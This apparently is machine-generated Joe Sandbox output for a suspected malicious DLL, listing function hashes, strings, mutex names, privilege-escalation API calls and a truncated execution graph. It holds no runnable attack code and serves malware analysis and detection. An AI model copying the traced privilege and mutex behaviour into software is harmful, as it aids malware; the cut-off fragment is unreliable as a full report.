                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_sprintf
                                                      • String ID: %d.%d.%d.%d
                                                      • API String ID: 1907722333-3491811756
                                                      • Opcode ID: 5fda938bba414d52271d6e3bbc24ecdcb9e570590cd88a7d4ceb9d3e6a259c51
                                                      • Instruction ID: dbf6fb1d5ed233b00b8bcbc95a8fbf83b5f59f4ce0bd6d7e0e012a4c93d07b08
                                                      • Opcode Fuzzy Hash: 5fda938bba414d52271d6e3bbc24ecdcb9e570590cd88a7d4ceb9d3e6a259c51
                                                      • Instruction Fuzzy Hash: 61216076D00149AFDB41DFE8CC419EFBBB8EF0C250F00842AE561E6151DB34EA15CBA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 4104443479-4289949731
                                                      • Opcode ID: b808868603bba8101947354f1a63435db6db78b48e9b133077a0f773a8039456
                                                      • Instruction ID: 33c90798f0d8516c084e0f09cf76161ef6dc691a2bb1ff66f4c7af30e0da5eef
                                                      • Opcode Fuzzy Hash: b808868603bba8101947354f1a63435db6db78b48e9b133077a0f773a8039456
                                                      • Instruction Fuzzy Hash: 2C1184717107049BC724CE58D894E5AB7EAEB85750B20492EE8A2CF6C1DBB1EA84C790
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000975F
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009798
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_H_prologInternal_throw_exception_malloc
                                                      • String ID: (
                                                      • API String ID: 1756248435-3887548279
                                                      • Opcode ID: 48339d87365cb671cd187dc6e04f692106807347fa193c7a8ce4dbb9a045d657
                                                      • Instruction ID: e9073c934538615a898e7b8652926b827aae5a784e18c78b09f8a191744ab2c5
                                                      • Opcode Fuzzy Hash: 48339d87365cb671cd187dc6e04f692106807347fa193c7a8ce4dbb9a045d657
                                                      • Instruction Fuzzy Hash: 522180B6D051159FDB04DF98D981AAEBBF4EF49390F11801AF808EB249D7709A40CB91
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000982E
                                                      • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 10009867
                                                        • Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::_Concurrent_queue_base_v4::_H_prologInternal_throw_exception_malloc
                                                      • String ID: \
                                                      • API String ID: 1756248435-2967466578
                                                      • Opcode ID: 1934921e5e3eba9dbe1ebf20acfb8ba0b5c0ccb354e30b11263ced142b908a9b
                                                      • Instruction ID: 999b7ef00291c24b21c61d77de65a700904c34b1fa21d5ee172efdb26d2e93fb
                                                      • Opcode Fuzzy Hash: 1934921e5e3eba9dbe1ebf20acfb8ba0b5c0ccb354e30b11263ced142b908a9b
                                                      • Instruction Fuzzy Hash: 542180B2E002159FDB04DF98C881A6EBBB5EF45790F11802AE914AB355CB70DA00CBD5
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100168F9
                                                        • Part of subcall function 10002F31: _memmove.LIBCMT ref: 10002F99
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog_memmove
                                                      • String ID: Global\$sadfasdf
                                                      • API String ID: 3529519853-3816382148
                                                      • Opcode ID: 874b96898145c5f955ea80f4427b7f34e6a07471e49c37df447fe611d2904711
                                                      • Instruction ID: b6ddd2b14e4a5dec44897576bf73c7027d8addb5aa797be0a8d53e5c108f34b1
                                                      • Opcode Fuzzy Hash: 874b96898145c5f955ea80f4427b7f34e6a07471e49c37df447fe611d2904711
                                                      • Instruction Fuzzy Hash: 860162B5600245AFE704DF698C41BBFB7ADFB84350F10052AB415D3681CBB46A4486A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologwsprintf
                                                      • String ID: %.2X
                                                      • API String ID: 1529278910-213608013
                                                      • Opcode ID: 612573fd24853ed19d8b92dd1d664a9c2feef3bd0967048898b0e64a18457f45
                                                      • Instruction ID: ab478701061cdb77f35751579b8944a13045e9843e2e555ae6caed241adfc7f2
                                                      • Opcode Fuzzy Hash: 612573fd24853ed19d8b92dd1d664a9c2feef3bd0967048898b0e64a18457f45
                                                      • Instruction Fuzzy Hash: 9D012176D00159ABDB00DFD9C881AEFFBB8FF48255F50446EE956E7201D734AA448BE0
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000BD45
                                                        • Part of subcall function 1000BC48: __EH_prolog.LIBCMT ref: 1000BC4D
                                                      • GetLastError.KERNEL32(10065258,?,00000000,?,?,?,10006353), ref: 1000BD74
                                                        • Part of subcall function 1000C8B3: __vwprintf_p.LIBCMT ref: 1000C8C4
                                                      Strings
                                                      • $ %sServer Start Fail --> %s (%d) [%d], xrefs: 1000BD82
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$ErrorLast__vwprintf_p
                                                      • String ID: $ %sServer Start Fail --> %s (%d) [%d]
                                                      • API String ID: 1262451674-3173535527
                                                      • Opcode ID: c2c585b0af37396207c6818f7f438401da5fd370e116ff001cf2518456425cb0
                                                      • Instruction ID: 3b1fed85a229fe3c3dd31323b3895a1ff75fef0c5f6b30761a08204955dbf93b
                                                      • Opcode Fuzzy Hash: c2c585b0af37396207c6818f7f438401da5fd370e116ff001cf2518456425cb0
                                                      • Instruction Fuzzy Hash: F6018175900149AFEB08DBA4CD9AEFEB779EF91255F14486DB011A3142EF706E04CB60
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000BF8A
                                                        • Part of subcall function 1000BC48: __EH_prolog.LIBCMT ref: 1000BC4D
                                                      • GetLastError.KERNEL32(10065258,?,00000000,?,?,?,10010EF5,?,?,?,00000000,1001106F,?,?,00000000,000003F1), ref: 1000BFB9
                                                        • Part of subcall function 1000C8B3: __vwprintf_p.LIBCMT ref: 1000C8C4
                                                      Strings
                                                      • $ %sClient Start Fail --> %s (%d) [%d], xrefs: 1000BFC7
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$ErrorLast__vwprintf_p
                                                      • String ID: $ %sClient Start Fail --> %s (%d) [%d]
                                                      • API String ID: 1262451674-3845868111
                                                      • Opcode ID: 4d9c736134dfcb5ee01bef30f32d39b64bc527b63c599545b06c6a19efabda61
                                                      • Instruction ID: a3f8479d2f1a97d83587bd67424716dad1497a1e395a593b9db06d3e0decfbcb
                                                      • Opcode Fuzzy Hash: 4d9c736134dfcb5ee01bef30f32d39b64bc527b63c599545b06c6a19efabda61
                                                      • Instruction Fuzzy Hash: 42018175900149AFEB08DBA4CD9AEFEB779EF91254F54486DA011A3142EF706E04CB60
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateGuid__snprintf_fprintf
                                                      • String ID: create guid error
                                                      • API String ID: 2959897907-1010078425
                                                      • Opcode ID: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
                                                      • Instruction ID: 88e1e5261fbf5aae0ab1c042631421d14db4c6bfa5234099037d4dc45f47e2ec
                                                      • Opcode Fuzzy Hash: 4cea7cf2b984337b4d7d4ffe6108a3fc19ca67f450e3d562278f7069529bb91a
                                                      • Instruction Fuzzy Hash: 5BF0B4B2D082846FEF06D7B0DC86EDD3FB8DB11645F004116E900DF183EA64E689CB91
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1000BCDB
                                                        • Part of subcall function 1000BC48: __EH_prolog.LIBCMT ref: 1000BC4D
                                                        • Part of subcall function 1000C8B3: __vwprintf_p.LIBCMT ref: 1000C8C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog$__vwprintf_p
                                                      • String ID: $ %sServer Start OK --> (%s#%d)$0.0.0.0
                                                      • API String ID: 4225948685-2468510531
                                                      • Opcode ID: 381a7653acad3b12b10e74cf2f37dbe3eafdcfa24e9c6e4b79a234bb1e2237d5
                                                      • Instruction ID: 9b943f2d4cba46cc5a067f3d4b275ad2c43369875d3c3dbf6459743123f560cf
                                                      • Opcode Fuzzy Hash: 381a7653acad3b12b10e74cf2f37dbe3eafdcfa24e9c6e4b79a234bb1e2237d5
                                                      • Instruction Fuzzy Hash: FCF0677491064AABEF08CBA0CE66EFEB332EB51205F104469A01226192EF756B08CB10
                                                      APIs
                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 1001AFCC
                                                      • SetLastError.KERNEL32(0000007E,?,1001B32E,?,?,?,?,000001C8), ref: 1001B0DD
                                                        • Part of subcall function 10034365: _malloc.LIBCMT ref: 10034371
                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 1001B0A9
                                                      • SetLastError.KERNEL32(0000007F,?,?,?,?,000001C8), ref: 1001B0C4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastRead$_malloc
                                                      • String ID:
                                                      • API String ID: 2118469604-0
                                                      • Opcode ID: f8a972bfd25c9ce03c998134bf18affddbe35a2f0b4b24ffc98d565020eec25a
                                                      • Instruction ID: 876cb2573bcba37d2384ddbd3581199b9326302aba0ee61cd12ffa339c10c994
                                                      • Opcode Fuzzy Hash: f8a972bfd25c9ce03c998134bf18affddbe35a2f0b4b24ffc98d565020eec25a
                                                      • Instruction Fuzzy Hash: 5B416571A00A05DFEB25CF69D888B6BB7F5FF88304B11886DE565DB691EB31E940CB10

                                                      Execution Graph

                                                      Execution Coverage:8.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1908
                                                      Total number of Limit Nodes:26
                                                      execution_graph 30271 10036725 30272 10036733 30271->30272 30273 1003672e 30271->30273 30277 10036748 30272->30277 30289 100454c3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 30273->30289 30276 10036741 30279 10036754 _doexit 30277->30279 30278 100367a2 30281 100367ff _doexit 30278->30281 30338 1001a9a0 30278->30338 30279->30278 30279->30281 30290 100365b3 30279->30290 30281->30276 30283 100367ba 30284 1001a9a0 ___DllMainCRTStartup 570 API calls 30283->30284 30288 100367dc 30283->30288 30286 100367d2 30284->30286 30285 100365b3 __CRT_INIT@12 131 API calls 30285->30281 30287 100365b3 __CRT_INIT@12 131 API calls 30286->30287 30287->30288 30288->30281 30288->30285 30289->30272 30291 100365bf _doexit 30290->30291 30292 10036641 30291->30292 30293 100365c7 30291->30293 30295 10036645 30292->30295 30296 100366aa 30292->30296 30388 1003f54c GetProcessHeap 30293->30388 30300 10036666 30295->30300 30331 100365d0 _doexit __CRT_INIT@12 30295->30331 30479 1003c89b 68 API calls _doexit 30295->30479 30298 100366af 30296->30298 30299 1003670d 30296->30299 30297 100365cc 30297->30331 30389 10041828 30297->30389 30484 1003937d 30298->30484 30299->30331 30501 100416b8 77 API calls 2 library calls 30299->30501 30480 1003c76f 71 API calls _free 30300->30480 30305 100366ba 30305->30331 30487 10039211 30305->30487 30308 1003666b 30310 1003667c __CRT_INIT@12 30308->30310 30481 10043f01 69 API calls _free 30308->30481 30483 10036695 TlsFree __mtterm 30310->30483 30314 10036677 30482 1004189e TlsFree __mtterm 30314->30482 30320 100366e3 30322 10036701 30320->30322 30323 100366e9 30320->30323 30495 10033984 30322->30495 30494 10041775 68 API calls 4 library calls 30323->30494 30327 100366f1 GetCurrentThreadId 30327->30331 30331->30278 30339 1001aba8 30338->30339 30340 1001a9cb 30338->30340 30342 1001abae 30339->30342 30383 1001ab94 Mailbox 30339->30383 30607 1001b976 CreateFileMappingA 30340->30607 30735 10007486 30342->30735 30347 1001a9da 30616 1001c2a5 GetCurrentProcess OpenProcessToken 30347->30616 30353 1001aa02 30677 10015fd9 30353->30677 30354 1001a9e6 OutputDebugStringA CreateMutexA 30360 1001aa21 Mailbox ___DllMainCRTStartup 30354->30360 30358 1001aa78 ___DllMainCRTStartup 30634 10001d63 30358->30634 30621 10011419 30360->30621 30364 1001aab5 30365 1001aab9 ___DllMainCRTStartup 30364->30365 30366 1001aaea ___DllMainCRTStartup 30364->30366 30692 10003256 30365->30692 30664 10001f26 30366->30664 30369 1001aafc 30671 1000e4a3 30369->30671 30370 1001aad0 30703 1000da3f 30370->30703 30373 1001ab0a ___DllMainCRTStartup 30377 1001ab2b ___DllMainCRTStartup 30373->30377 30378 1001ab6e 30373->30378 30376 1001aae6 30717 100117aa 30376->30717 30382 10003256 ___DllMainCRTStartup 69 API calls 30377->30382 30380 1001ab77 CreateThread 30378->30380 30378->30383 30380->30383 31933 1001a91c 30380->31933 30384 1001ab42 30382->30384 30383->30283 30385 1000da3f ___DllMainCRTStartup 108 API calls 30384->30385 30386 1001ab49 30385->30386 30387 10002d15 ___DllMainCRTStartup 69 API calls 30386->30387 30387->30376 30388->30297 30502 1003c94f EncodePointer EncodePointer __init_pointers __initp_misc_winsig 30389->30502 30479->30300 30480->30308 30481->30314 30483->30331 30485 10039390 30484->30485 30486 10039394 TlsGetValue 30484->30486 30485->30305 30486->30305 30490 10039218 30487->30490 30489 100366cb 30489->30331 30493 1003939c TlsSetValue 30489->30493 30490->30489 30491 10039236 Sleep 30490->30491 30596 10045628 30490->30596 30492 1003924d 30491->30492 30492->30489 30492->30490 30493->30320 30494->30327 30496 100339b6 _free 30495->30496 30497 1003398d RtlFreeHeap 30495->30497 30496->30331 30497->30496 30498 100339a2 30497->30498 30606 10037f1f 68 API calls __getptd_noexit 30498->30606 30500 100339a8 GetLastError 30500->30496 30501->30331 30597 10045633 30596->30597 30598 1004564e 30596->30598 30597->30598 30599 1004563f 30597->30599 30601 1004565e HeapAlloc 30598->30601 30602 10045644 30598->30602 30605 1003d131 DecodePointer 30598->30605 30604 10037f1f 68 API calls __getptd_noexit 30599->30604 30601->30598 30601->30602 30602->30490 30604->30602 30605->30598 30606->30500 30608 1001b9a4 MapViewOfFile 30607->30608 30609 1001b99a GetLastError 30607->30609 30610 1001a9d0 30608->30610 30611 1001b9bc CloseHandle 30608->30611 30609->30610 30612 1000c15a 30610->30612 30611->30610 30613 1000c180 ___lc_wcstolc 30612->30613 30748 100347dc 30613->30748 30615 1000c199 ___lc_wcstolc _memmove 30615->30347 30615->30615 30617 1001a9e0 30616->30617 30618 1001c2c6 LookupPrivilegeValueA 30616->30618 30617->30353 30617->30354 30619 1001c30c CloseHandle 30618->30619 30620 1001c2dc AdjustTokenPrivileges 30618->30620 30619->30617 30620->30617 30620->30619 30622 10011423 ___DllMainCRTStartup __EH_prolog 30621->30622 30623 10001f26 ___DllMainCRTStartup 69 API calls 30622->30623 30624 10011449 30623->30624 30625 10011452 ___DllMainCRTStartup 30624->30625 30626 100114b6 30624->30626 30628 10001f26 ___DllMainCRTStartup 69 API calls 30625->30628 30627 10002d15 ___DllMainCRTStartup 69 API calls 30626->30627 30633 10011485 Mailbox ___DllMainCRTStartup 30627->30633 30629 1001146a 30628->30629 30630 10015fd9 ___DllMainCRTStartup 69 API calls 30629->30630 30631 10011477 30630->30631 30632 1001bc82 ___DllMainCRTStartup 72 API calls 30631->30632 30632->30633 30633->30358 30635 10001d7f ___DllMainCRTStartup 30634->30635 30636 10001f26 ___DllMainCRTStartup 69 API calls 30635->30636 30637 10001d8b 30636->30637 30638 1001a6d8 30637->30638 30639 1001a6e2 ___lc_wcstolc __EH_prolog 30638->30639 30794 1001136c 30639->30794 30641 1001a711 Mailbox 30804 1001c213 30641->30804 30645 1001a746 ___DllMainCRTStartup 30646 10003256 ___DllMainCRTStartup 69 API calls 30645->30646 30647 1001a75e 30646->30647 30823 10001898 30647->30823 30649 1001a775 30650 10001d63 numpunct 69 API calls 30649->30650 30651 1001a77e 30650->30651 30827 100168f4 30651->30827 30653 1001a7a1 OpenMutexA GetLastError 30656 1001a78e 30653->30656 30657 1001a7f6 ___DllMainCRTStartup 30653->30657 30654 1001a7cd OpenMutexA GetLastError 30654->30656 30654->30657 30655 1001a833 ReleaseMutex CloseHandle 30655->30656 30656->30653 30656->30654 30656->30657 30658 1001a866 CreateMutexA CreateMutexA GetLastError 30656->30658 30659 1001a846 Sleep 30656->30659 30657->30655 30660 1001a811 ReleaseMutex CloseHandle 30657->30660 30662 1001a8a7 ReleaseMutex CloseHandle ReleaseMutex CloseHandle 30658->30662 30663 1001a8d5 Mailbox ___DllMainCRTStartup 30658->30663 30659->30653 30661 1001a861 30659->30661 30660->30659 30661->30663 30662->30663 30663->30364 30665 10001f36 ___DllMainCRTStartup 30664->30665 30666 10001f56 30665->30666 30667 10001f3a 30665->30667 30668 10001f9f ___DllMainCRTStartup 69 API calls 30666->30668 30868 10001e92 30667->30868 30670 10001f54 _memmove 30668->30670 30670->30369 30672 1000e4b0 30671->30672 30673 1000e4b5 30671->30673 30672->30373 30674 10002d15 ___DllMainCRTStartup 69 API calls 30673->30674 30675 1000e4c6 30674->30675 30893 1000dd2b 30675->30893 30678 10015ff7 char_traits 30677->30678 31206 1001658d 30678->31206 30680 10016003 30681 1001bc82 30680->30681 30682 1001bc8c __EH_prolog 30681->30682 30683 10001d63 numpunct 69 API calls 30682->30683 30684 1001bcab 30683->30684 30685 1001bd20 30684->30685 30686 1001bcd5 LocalAlloc 30684->30686 30685->30360 30686->30685 30687 1001bcee WideCharToMultiByte 30686->30687 30689 1001bd0f ___DllMainCRTStartup 30687->30689 30690 10001f26 ___DllMainCRTStartup 69 API calls 30689->30690 30691 1001bd19 LocalFree 30690->30691 30691->30685 30693 10003266 ___DllMainCRTStartup 30692->30693 30694 10003286 30693->30694 30695 1000326a 30693->30695 30696 10003296 30694->30696 30697 100032ed 30694->30697 30701 10002f31 ___DllMainCRTStartup 69 API calls 30695->30701 30699 10001f9f ___DllMainCRTStartup 69 API calls 30696->30699 30702 10003284 _memmove 30696->30702 31215 1003248d 69 API calls 2 library calls 30697->31215 30699->30702 30701->30702 30702->30370 30704 1001136c ___DllMainCRTStartup 108 API calls 30703->30704 30705 1000dab8 Mailbox ___DllMainCRTStartup 30704->30705 30706 1000dada 30705->30706 31216 100339bc 30705->31216 30707 1000daf4 30706->30707 30709 100339bc _malloc 68 API calls 30706->30709 30710 1000db09 30707->30710 30711 100339bc _malloc 68 API calls 30707->30711 30709->30707 30712 1000db22 30710->30712 30713 100339bc _malloc 68 API calls 30710->30713 30711->30710 30714 10002d15 30712->30714 30713->30712 30715 10001e92 ___DllMainCRTStartup 69 API calls 30714->30715 30716 10002d34 30715->30716 30716->30376 30718 100117b4 ___DllMainCRTStartup __EH_prolog 30717->30718 30719 10001f26 ___DllMainCRTStartup 69 API calls 30718->30719 30720 100117f8 30719->30720 30721 10001e92 ___DllMainCRTStartup 69 API calls 30720->30721 30722 10011824 30721->30722 30723 1001183b 30722->30723 30724 10001e92 ___DllMainCRTStartup 69 API calls 30722->30724 31241 10015de8 30723->31241 30724->30723 30727 10011850 31252 1001570f 30727->31252 30728 10011857 31276 100154f5 122 API calls 6 library calls 30728->31276 30731 10011855 30732 